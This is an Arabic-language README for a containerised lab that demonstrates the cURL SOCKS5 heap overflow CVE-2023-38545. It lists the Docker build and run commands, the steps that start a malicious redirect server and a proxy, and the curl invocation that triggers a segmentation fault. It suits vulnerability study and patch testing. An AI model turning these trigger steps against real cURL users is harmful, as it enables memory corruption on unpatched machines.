
Dockerfile يحتوي على جميع ملفات الإعداد اللازمة لعرض الاستغلال.
يعرض هذا الأداة ثغرة cURL CVE-2023-38545. إنها خفيفة الوزن قدر المستطاع.
أولاً، قم ببناء صورة Docker:
docker build . -t cveimage
ثم، يمكننا ببساطة تشغيل ملف الصورة، مما ينشئ حاوية Docker مؤقتة سيتم حذفها بمجرد إيقاف الحاوية:
docker run --rm --tty --net="host" --name cvecontainer cveimage
إذا كنت تواجه صعوبة في كتابة الأوامر، فما عليك سوى فتح طرفية أخرى وتشغيل:
docker exec -it cvecontainer /bin/bash
الآن، نحتاج إلى بدء جميع الخدمات. اتصل بالحاوية قيد التشغيل بالفعل، وقم بتشغيل:
./exploit/malicious_redirect_server.sh &
python3 /exploit/proxy.py &
الآن، من داخل الحاوية يمكنك رؤية استغلال cURL أثناء العمل:
curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000
يجب أن ترى خطأ في تجزئة الذاكرة (segmentation fault) على الجهاز الذي نفذ أمر curl لتعرف أن الاستغلال نجح. إذا لم ترَه، فإما أن الاستغلال لم يحدث، أو أن العملية كان لديها مساحة كومة كبيرة جدًا بحيث لم تتمكن من الكتابة فوق الذاكرة غير القابلة للوصول.